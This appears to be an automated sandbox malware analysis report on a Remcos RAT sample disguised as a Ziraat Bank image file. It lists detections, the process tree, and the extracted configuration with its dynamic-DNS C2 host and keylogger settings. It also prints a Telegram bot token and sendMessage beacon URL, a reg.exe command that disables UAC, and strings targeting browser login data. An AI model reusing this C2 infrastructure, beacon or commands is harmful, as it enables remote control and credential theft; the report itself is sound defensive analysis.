Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
IMG-ZIRAATI03102022.exe

Overview

General Information

Sample Name:IMG-ZIRAATI03102022.exe
Analysis ID:715079
MD5:3b4a0b66d0415af1e216224497c59b4b
SHA1:d5f559097a703f155bad6b8610a48ea2dbd68b27
SHA256:95c80a6add91050a965c4d38e3db1736c7cfc8c286e87c9d1c3aeb46ee3a95de
Tags:exegeoRemcosRATTURZiraatBank
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Remcos RAT
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Installs a global keyboard hook
Yara detected Costura Assembly Loader
Encrypted powershell cmdline option found
Uses the Telegram API (likely for C&C communication)
Machine Learning detection for sample
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Uses dynamic DNS services
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Drops PE files to the application program directory (C:\ProgramData)
May sleep (evasive loops) to hinder dynamic analysis
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Detected TCP or UDP traffic on non-standard ports
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Process Tree

  • System is w10x64
  • IMG-ZIRAATI03102022.exe (PID: 5820 cmdline: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exe MD5: 3B4A0B66D0415AF1E216224497C59B4B)
    • powershell.exe (PID: 6036 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQAwAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • IMG-ZIRAATI03102022.exe (PID: 4124 cmdline: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exe MD5: 3B4A0B66D0415AF1E216224497C59B4B)
      • wscript.exe (PID: 5032 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs" MD5: 7075DD7B9BE8807FCA93ACD86F724884)
  • FILE.exe (PID: 4184 cmdline: "C:\Users\user\AppData\Roaming\FILE.exe" MD5: 3B4A0B66D0415AF1E216224497C59B4B)
    • powershell.exe (PID: 2464 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQAwAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 1840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • FILE.exe (PID: 6112 cmdline: C:\Users\user\AppData\Roaming\FILE.exe MD5: 3B4A0B66D0415AF1E216224497C59B4B)
  • cleanup

Malware Configuration

Threatname: Remcos

{"Version": "3.8.0 Pro", "Host:Port:Password": "remcapi.duckdns.org:2028:1", "Assigned name": "NEW", "Connect interval": "1", "Install flag": "Enable", "Setup HKCU\\Run": "Disable", "Setup HKLM\\Run": "Disable", "Install path": "Application path", "Copy file": "FILE.EXE", "Startup value": "file", "Hide file": "Disable", "Mutex": "Rmc-L9LQMY", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Enable", "Audio record time": "5"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.424695583.0000000005F60000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
    00000000.00000003.406392535.00000000044C4000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
      00000000.00000002.416884855.0000000002F97000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        0000000C.00000000.414784551.0000000000456000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          0000000C.00000000.414784551.0000000000456000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
          • 0x131e0:$a1: Remcos restarted by watchdog!
          • 0x13738:$a3: %02i:%02i:%02i:%03i
          • 0x13abd:$a4: * Remcos v
          Click to see the 17 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.2.IMG-ZIRAATI03102022.exe.5f60000.6.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            0.2.IMG-ZIRAATI03102022.exe.4173680.3.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
              0.2.IMG-ZIRAATI03102022.exe.4173680.3.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewerdetects Windows exceutables potentially bypassing UAC using eventvwr.exeditekSHen
              • 0x60100:$s1: \Classes\mscfile\shell\open\command
              • 0x60160:$s1: \Classes\mscfile\shell\open\command
              • 0x60148:$s2: eventvwr.exe
              0.2.IMG-ZIRAATI03102022.exe.4173680.3.unpackWindows_Trojan_Remcos_b296e965unknownunknown
              • 0x661e0:$a1: Remcos restarted by watchdog!
              • 0x66738:$a3: %02i:%02i:%02i:%03i
              • 0x66abd:$a4: * Remcos v
              0.2.IMG-ZIRAATI03102022.exe.4173680.3.unpackREMCOS_RAT_variantsunknownunknown
              • 0x611e4:$str_a1: C:\Windows\System32\cmd.exe
              • 0x61160:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
              • 0x61160:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
              • 0x60610:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
              • 0x60e48:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
              • 0x6020c:$str_b2: Executing file:
              • 0x61328:$str_b3: GetDirectListeningPort
              • 0x60c08:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
              • 0x60e30:$str_b7: \update.vbs
              • 0x60234:$str_b9: Downloaded file:
              • 0x60220:$str_b10: Downloading file:
              • 0x602c4:$str_b12: Failed to upload file:
              • 0x612f0:$str_b13: StartForward
              • 0x61310:$str_b14: StopForward
              • 0x60dd8:$str_b15: fso.DeleteFile "
              • 0x60d6c:$str_b16: On Error Resume Next
              • 0x60e08:$str_b17: fso.DeleteFolder "
              • 0x602b4:$str_b18: Uploaded file:
              • 0x60274:$str_b19: Unable to delete:
              • 0x60da0:$str_b20: while fso.FileExists("
              • 0x60749:$str_c0: [Firefox StoredLogins not found]
              Click to see the 26 entries

              Sigma Signatures

              No Sigma rule has matched

              Snort Signatures

              Timestamp:144.76.120.25192.168.2.3443496982022640 10/03/22-16:01:58.201313
              SID:2022640
              Source Port:443
              Destination Port:49698
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:144.76.120.25192.168.2.3443497022022640 10/03/22-16:03:31.618225
              SID:2022640
              Source Port:443
              Destination Port:49702
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:144.76.120.25192.168.2.3443496982017962 10/03/22-16:01:58.201313
              SID:2017962
              Source Port:443
              Destination Port:49698
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:144.76.120.25192.168.2.3443497022012252 10/03/22-16:03:32.840377
              SID:2012252
              Source Port:443
              Destination Port:49702
              Protocol:TCP
              Classtype:Executable code was detected
              Timestamp:144.76.120.25192.168.2.3443496982012252 10/03/22-16:01:59.246844
              SID:2012252
              Source Port:443
              Destination Port:49698
              Protocol:TCP
              Classtype:Executable code was detected
              Timestamp:144.76.120.25192.168.2.3443497022017962 10/03/22-16:03:31.618225
              SID:2017962
              Source Port:443
              Destination Port:49702
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Multi AV Scanner detection for submitted file
              Source: IMG-ZIRAATI03102022.exeReversingLabs: Detection: 26%
              Source: IMG-ZIRAATI03102022.exeVirustotal: Detection: 26%Perma Link
              Yara detected Remcos RAT
              Source: Yara matchFile source: 0.2.IMG-ZIRAATI03102022.exe.4173680.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.IMG-ZIRAATI03102022.exe.42136a0.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.IMG-ZIRAATI03102022.exe.4173680.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.0.IMG-ZIRAATI03102022.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.IMG-ZIRAATI03102022.exe.4123660.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.IMG-ZIRAATI03102022.exe.40fb640.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.IMG-ZIRAATI03102022.exe.42136a0.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000C.00000000.414784551.0000000000456000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000002.610648018.0000000003DDE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.422576677.00000000040BA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000017.00000002.773154547.0000000001237000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.423542604.0000000004213000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: IMG-ZIRAATI03102022.exe PID: 5820, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: IMG-ZIRAATI03102022.exe PID: 4124, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: FILE.exe PID: 4184, type: MEMORYSTR
              Antivirus detection for URL or domain
              Source: remcapi.duckdns.orgAvira URL Cloud: Label: malware
              Multi AV Scanner detection for domain / URL
              Source: remcapi.duckdns.orgVirustotal: Detection: 13%Perma Link
              Antivirus detection for dropped file
              Source: C:\Users\user\AppData\Local\Temp\install.vbsAvira: detection malicious, Label: VBS/Runner.VPE
              Multi AV Scanner detection for dropped file
              Source: C:\ProgramData\work\FILE.EXEReversingLabs: Detection: 26%
              Source: C:\Users\user\AppData\Roaming\FILE.exeReversingLabs: Detection: 26%
              Machine Learning detection for sample
              Source: IMG-ZIRAATI03102022.exeJoe Sandbox ML: detected
              Machine Learning detection for dropped file
              Source: C:\Users\user\AppData\Roaming\FILE.exeJoe Sandbox ML: detected
              Source: C:\ProgramData\work\FILE.EXEJoe Sandbox ML: detected
              Source: 12.0.IMG-ZIRAATI03102022.exe.400000.0.unpackAvira: Label: BDS/Backdoor.Gen
              Source: 0.2.IMG-ZIRAATI03102022.exe.4173680.3.raw.unpackMalware Configuration Extractor: Remcos {"Version": "3.8.0 Pro", "Host:Port:Password": "remcapi.duckdns.org:2028:1", "Assigned name": "NEW", "Connect interval": "1", "Install flag": "Enable", "Setup HKCU\\Run": "Disable", "Setup HKLM\\Run": "Disable", "Install path": "Application path", "Copy file": "FILE.EXE", "Startup value": "file", "Hide file": "Disable", "Mutex": "Rmc-L9LQMY", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Enable", "Audio record time": "5"}
              Source: IMG-ZIRAATI03102022.exe, 00000000.00000002.422576677.00000000040BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----
              Source: IMG-ZIRAATI03102022.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 144.76.120.25:443 -> 192.168.2.3:49698 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49701 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 144.76.120.25:443 -> 192.168.2.3:49702 version: TLS 1.2
              Source: IMG-ZIRAATI03102022.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: IMG-ZIRAATI03102022.exe, 00000000.00000003.406392535.00000000044C4000.00000004.00000800.00020000.00000000.sdmp, IMG-ZIRAATI03102022.exe, 00000000.00000003.406963478.0000000004647000.00000004.00000800.00020000.00000000.sdmp, IMG-ZIRAATI03102022.exe, 00000000.00000002.425430724.0000000006120000.00000004.08000000.00040000.00000000.sdmp, IMG-ZIRAATI03102022.exe, 00000000.00000002.417758513.0000000003182000.00000004.00000800.00020000.00000000.sdmp, FILE.exe, 00000011.00000002.612073197.00000000044AF000.00000004.00000800.00020000.00000000.sdmp, FILE.exe, 00000011.00000002.606501365.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, FILE.exe, 00000011.00000002.611674099.000000000440F000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256w^ source: IMG-ZIRAATI03102022.exe, 00000000.00000003.406392535.00000000044C4000.00000004.00000800.00020000.00000000.sdmp, IMG-ZIRAATI03102022.exe, 00000000.00000003.406963478.0000000004647000.00000004.00000800.00020000.00000000.sdmp, IMG-ZIRAATI03102022.exe, 00000000.00000002.425430724.0000000006120000.00000004.08000000.00040000.00000000.sdmp, IMG-ZIRAATI03102022.exe, 00000000.00000002.417758513.0000000003182000.00000004.00000800.00020000.00000000.sdmp, FILE.exe, 00000011.00000002.612073197.00000000044AF000.00000004.00000800.00020000.00000000.sdmp, FILE.exe, 00000011.00000002.606501365.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, FILE.exe, 00000011.00000002.611674099.000000000440F000.00000004.00000800.00020000.00000000.sdmp

              Networking

              barindex
              Snort IDS alert for network traffic
              Source: TrafficSnort IDS: 2022640 ET TROJAN PE EXE or DLL Windows file download Text M2 144.76.120.25:443 -> 192.168.2.3:49698
              Source: TrafficSnort IDS: 2017962 ET TROJAN PE EXE or DLL Windows file download disguised as ASCII 144.76.120.25:443 -> 192.168.2.3:49698
              Source: TrafficSnort IDS: 2012252 ET SHELLCODE Common 0a0a0a0a Heap Spray String 144.76.120.25:443 -> 192.168.2.3:49698
              Source: TrafficSnort IDS: 2022640 ET TROJAN PE EXE or DLL Windows file download Text M2 144.76.120.25:443 -> 192.168.2.3:49702
              Source: TrafficSnort IDS: 2017962 ET TROJAN PE EXE or DLL Windows file download disguised as ASCII 144.76.120.25:443 -> 192.168.2.3:49702
              Source: TrafficSnort IDS: 2012252 ET SHELLCODE Common 0a0a0a0a Heap Spray String 144.76.120.25:443 -> 192.168.2.3:49702
              Uses the Telegram API (likely for C&C communication)
              Source: unknownDNS query: name: api.telegram.org
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: remcapi.duckdns.org
              Uses dynamic DNS services
              Source: unknownDNS query: name: remcapi.duckdns.org
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: global trafficHTTP traffic detected: GET /img/image/57/b15c1f2fa18efb7b0a2e9e577171ed5d/IMG-ZIRAATI03102022-Wqnntgku.jpg HTTP/1.1Host: www.uplooder.netConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /bot5700424484:AAHP7I1VQ--kj9KZNXGLeSEyqUKvt4ILTyk/sendMessage?chat_id=1391434830&text=%0D%0A%F0%9F%94%8A%20*NEW%20EXECUTION*%0D%0A1%EF%B8%8F%E2%83%A3%20User%20=%20user%0D%0A2%EF%B8%8F%E2%83%A3%20Date%20UTC%20=%2010/3/2022%2011:03:09%20PM%0D%0A3%EF%B8%8F%E2%83%A3%20File%20=%20IMG-ZIRAATI03102022.exe HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /img/image/57/b15c1f2fa18efb7b0a2e9e577171ed5d/IMG-ZIRAATI03102022-Wqnntgku.jpg HTTP/1.1Host: www.uplooder.netConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
              Source: Joe Sandbox ViewIP Address: 144.76.120.25 144.76.120.25
              Source: global trafficTCP traffic: 192.168.2.3:49703 -> 79.134.225.75:2028
              Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
              Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
              Source: IMG-ZIRAATI03102022.exe, 00000000.00000002.417758513.0000000003182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
              Source: IMG-ZIRAATI03102022.exe, 00000000.00000003.406392535.00000000044C4000.00000004.00000800.00020000.00000000.sdmp, IMG-ZIRAATI03102022.exe, 00000000.00000003.406963478.0000000004647000.00000004.00000800.00020000.00000000.sdmp, IMG-ZIRAATI03102022.exe, 00000000.00000002.425430724.0000000006120000.00000004.08000000.00040000.00000000.sdmp, IMG-ZIRAATI03102022.exe, 00000000.00000002.417758513.0000000003182000.00000004.00000800.00020000.00000000.sdmp, FILE.exe, 00000011.00000002.612073197.00000000044AF000.00000004.00000800.00020000.00000000.sdmp, FILE.exe, 00000011.00000002.606501365.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, FILE.exe, 00000011.00000002.611674099.000000000440F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
              Source: IMG-ZIRAATI03102022.exe, 00000000.00000003.406392535.00000000044C4000.00000004.00000800.00020000.00000000.sdmp, IMG-ZIRAATI03102022.exe, 00000000.00000003.406963478.0000000004647000.00000004.00000800.00020000.00000000.sdmp, IMG-ZIRAATI03102022.exe, 00000000.00000002.425430724.0000000006120000.00000004.08000000.00040000.00000000.sdmp, IMG-ZIRAATI03102022.exe, 00000000.00000002.417758513.0000000003182000.00000004.00000800.00020000.00000000.sdmp, FILE.exe, 00000011.00000002.612073197.00000000044AF000.00000004.00000800.00020000.00000000.sdmp, FILE.exe, 00000011.00000002.606501365.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, FILE.exe, 00000011.00000002.611674099.000000000440F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
              Source: IMG-ZIRAATI03102022.exe, 00000000.00000003.406392535.00000000044C4000.00000004.00000800.00020000.00000000.sdmp, IMG-ZIRAATI03102022.exe, 00000000.00000003.406963478.0000000004647000.00000004.00000800.00020000.00000000.sdmp, IMG-ZIRAATI03102022.exe, 00000000.00000002.425430724.0000000006120000.00000004.08000000.00040000.00000000.sdmp, IMG-ZIRAATI03102022.exe, 00000000.00000002.417758513.0000000003182000.00000004.00000800.00020000.00000000.sdmp, FILE.exe, 00000011.00000002.612073197.00000000044AF000.00000004.00000800.00020000.00000000.sdmp, FILE.exe, 00000011.00000002.606501365.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, FILE.exe, 00000011.00000002.611674099.000000000440F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA.crt0
              Source: FILE.exe, 00000011.00000002.604000895.000000000110E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
              Source: IMG-ZIRAATI03102022.exe, 00000000.00000003.406392535.00000000044C4000.00000004.00000800.00020000.00000000.sdmp, IMG-ZIRAATI03102022.exe, 00000000.00000003.406963478.0000000004647000.00000004.00000800.00020000.00000000.sdmp, IMG-ZIRAATI03102022.exe, 00000000.00000002.425430724.0000000006120000.00000004.08000000.00040000.00000000.sdmp, IMG-ZIRAATI03102022.exe, 00000000.00000002.417758513.0000000003182000.00000004.00000800.00020000.00000000.sdmp, FILE.exe, 00000011.00000002.612073197.00000000044AF000.00000004.00000800.00020000.00000000.sdmp, FILE.exe, 00000011.00000002.606501365.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, FILE.exe, 00000011.00000002.611674099.000000000440F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
              Source: IMG-ZIRAATI03102022.exe, 00000000.00000003.406392535.00000000044C4000.00000004.00000800.00020000.00000000.sdmp, IMG-ZIRAATI03102022.exe, 00000000.00000003.406963478.0000000004647000.00000004.00000800.00020000.00000000.sdmp, IMG-ZIRAATI03102022.exe, 00000000.00000002.425430724.0000000006120000.00000004.08000000.00040000.00000000.sdmp, IMG-ZIRAATI03102022.exe, 00000000.00000002.417758513.0000000003182000.00000004.00000800.00020000.00000000.sdmp, FILE.exe, 00000011.00000002.612073197.00000000044AF000.00000004.00000800.00020000.00000000.sdmp, FILE.exe, 00000011.00000002.606501365.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, FILE.exe, 00000011.00000002.611674099.000000000440F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
              Source: IMG-ZIRAATI03102022.exe, 00000000.00000003.406392535.00000000044C4000.00000004.00000800.00020000.00000000.sdmp, IMG-ZIRAATI03102022.exe, 00000000.00000003.406963478.0000000004647000.00000004.00000800.00020000.00000000.sdmp, IMG-ZIRAATI03102022.exe, 00000000.00000002.425430724.0000000006120000.00000004.08000000.00040000.00000000.sdmp, IMG-ZIRAATI03102022.exe, 00000000.00000002.417758513.0000000003182000.00000004.00000800.00020000.00000000.sdmp, FILE.exe, 00000011.00000002.612073197.00000000044AF000.00000004.00000800.00020000.00000000.sdmp, FILE.exe, 00000011.00000002.606501365.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, FILE.exe, 00000011.00000002.611674099.000000000440F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA.crl0E
              Source: IMG-ZIRAATI03102022.exe, 00000000.00000003.406392535.00000000044C4000.00000004.00000800.00020000.00000000.sdmp, IMG-ZIRAATI03102022.exe, 00000000.00000003.406963478.0000000004647000.00000004.00000800.00020000.00000000.sdmp, IMG-ZIRAATI03102022.exe, 00000000.00000002.425430724.0000000006120000.00000004.08000000.00040000.00000000.sdmp, IMG-ZIRAATI03102022.exe, 00000000.00000002.417758513.0000000003182000.00000004.00000800.00020000.00000000.sdmp, FILE.exe, 00000011.00000002.612073197.00000000044AF000.00000004.00000800.00020000.00000000.sdmp, FILE.exe, 00000011.00000002.606501365.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, FILE.exe, 00000011.00000002.611674099.000000000440F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
              Source: IMG-ZIRAATI03102022.exe, 00000000.00000003.406392535.00000000044C4000.00000004.00000800.00020000.00000000.sdmp, IMG-ZIRAATI03102022.exe, 00000000.00000003.406963478.0000000004647000.00000004.00000800.00020000.00000000.sdmp, IMG-ZIRAATI03102022.exe, 00000000.00000002.425430724.0000000006120000.00000004.08000000.00040000.00000000.sdmp, IMG-ZIRAATI03102022.exe, 00000000.00000002.417758513.0000000003182000.00000004.00000800.00020000.00000000.sdmp, FILE.exe, 00000011.00000002.612073197.00000000044AF000.00000004.00000800.00020000.00000000.sdmp, FILE.exe, 00000011.00000002.606501365.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, FILE.exe, 00000011.00000002.611674099.000000000440F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
              Source: IMG-ZIRAATI03102022.exe, 00000000.00000003.406392535.00000000044C4000.00000004.00000800.00020000.00000000.sdmp, IMG-ZIRAATI03102022.exe, 00000000.00000003.406963478.0000000004647000.00000004.00000800.00020000.00000000.sdmp, IMG-ZIRAATI03102022.exe, 00000000.00000002.425430724.0000000006120000.00000004.08000000.00040000.00000000.sdmp, IMG-ZIRAATI03102022.exe, 00000000.00000002.417758513.0000000003182000.00000004.00000800.00020000.00000000.sdmp, FILE.exe, 00000011.00000002.612073197.00000000044AF000.00000004.00000800.00020000.00000000.sdmp, FILE.exe, 00000011.00000002.606501365.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, FILE.exe, 00000011.00000002.611674099.000000000440F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA.crl0L
              Source: IMG-ZIRAATI03102022.exe, 00000000.00000003.406392535.00000000044C4000.00000004.00000800.00020000.00000000.sdmp, IMG-ZIRAATI03102022.exe, 00000000.00000003.406963478.0000000004647000.00000004.00000800.00020000.00000000.sdmp, IMG-ZIRAATI03102022.exe, 00000000.00000002.425430724.0000000006120000.00000004.08000000.00040000.00000000.sdmp, IMG-ZIRAATI03102022.exe, 00000000.00000002.417758513.0000000003182000.00000004.00000800.00020000.00000000.sdmp, FILE.exe, 00000011.00000002.612073197.00000000044AF000.00000004.00000800.00020000.00000000.sdmp, FILE.exe, 00000011.00000002.606501365.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, FILE.exe, 00000011.00000002.611674099.000000000440F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
              Source: IMG-ZIRAATI03102022.exe, 00000000.00000002.422576677.00000000040BA000.00000004.00000800.00020000.00000000.sdmp, IMG-ZIRAATI03102022.exe, 00000000.00000002.423542604.0000000004213000.00000004.00000800.00020000.00000000.sdmp, IMG-ZIRAATI03102022.exe, 0000000C.00000000.414784551.0000000000456000.00000040.00000400.00020000.00000000.sdmp, FILE.exe, 00000011.00000002.610648018.0000000003DDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
              Source: FILE.exe, 00000011.00000002.611674099.000000000440F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://james.newtonking.com/projects/json
              Source: IMG-ZIRAATI03102022.exe, 00000000.00000003.406392535.00000000044C4000.00000004.00000800.00020000.00000000.sdmp, IMG-ZIRAATI03102022.exe, 00000000.00000003.406963478.0000000004647000.00000004.00000800.00020000.00000000.sdmp, IMG-ZIRAATI03102022.exe, 00000000.00000002.425430724.0000000006120000.00000004.08000000.00040000.00000000.sdmp, IMG-ZIRAATI03102022.exe, 00000000.00000002.417758513.0000000003182000.00000004.00000800.00020000.00000000.sdmp, FILE.exe, 00000011.00000002.612073197.00000000044AF000.00000004.00000800.00020000.00000000.sdmp, FILE.exe, 00000011.00000002.606501365.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, FILE.exe, 00000011.00000002.611674099.000000000440F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
              Source: IMG-ZIRAATI03102022.exe, 00000000.00000003.406392535.00000000044C4000.00000004.00000800.00020000.00000000.sdmp, IMG-ZIRAATI03102022.exe, 00000000.00000003.406963478.0000000004647000.00000004.00000800.00020000.00000000.sdmp, IMG-ZIRAATI03102022.exe, 00000000.00000002.425430724.0000000006120000.00000004.08000000.00040000.00000000.sdmp, IMG-ZIRAATI03102022.exe, 00000000.00000002.417758513.0000000003182000.00000004.00000800.00020000.00000000.sdmp, FILE.exe, 00000011.00000002.612073197.00000000044AF000.00000004.00000800.00020000.00000000.sdmp, FILE.exe, 00000011.00000002.606501365.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, FILE.exe, 00000011.00000002.611674099.000000000440F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0K
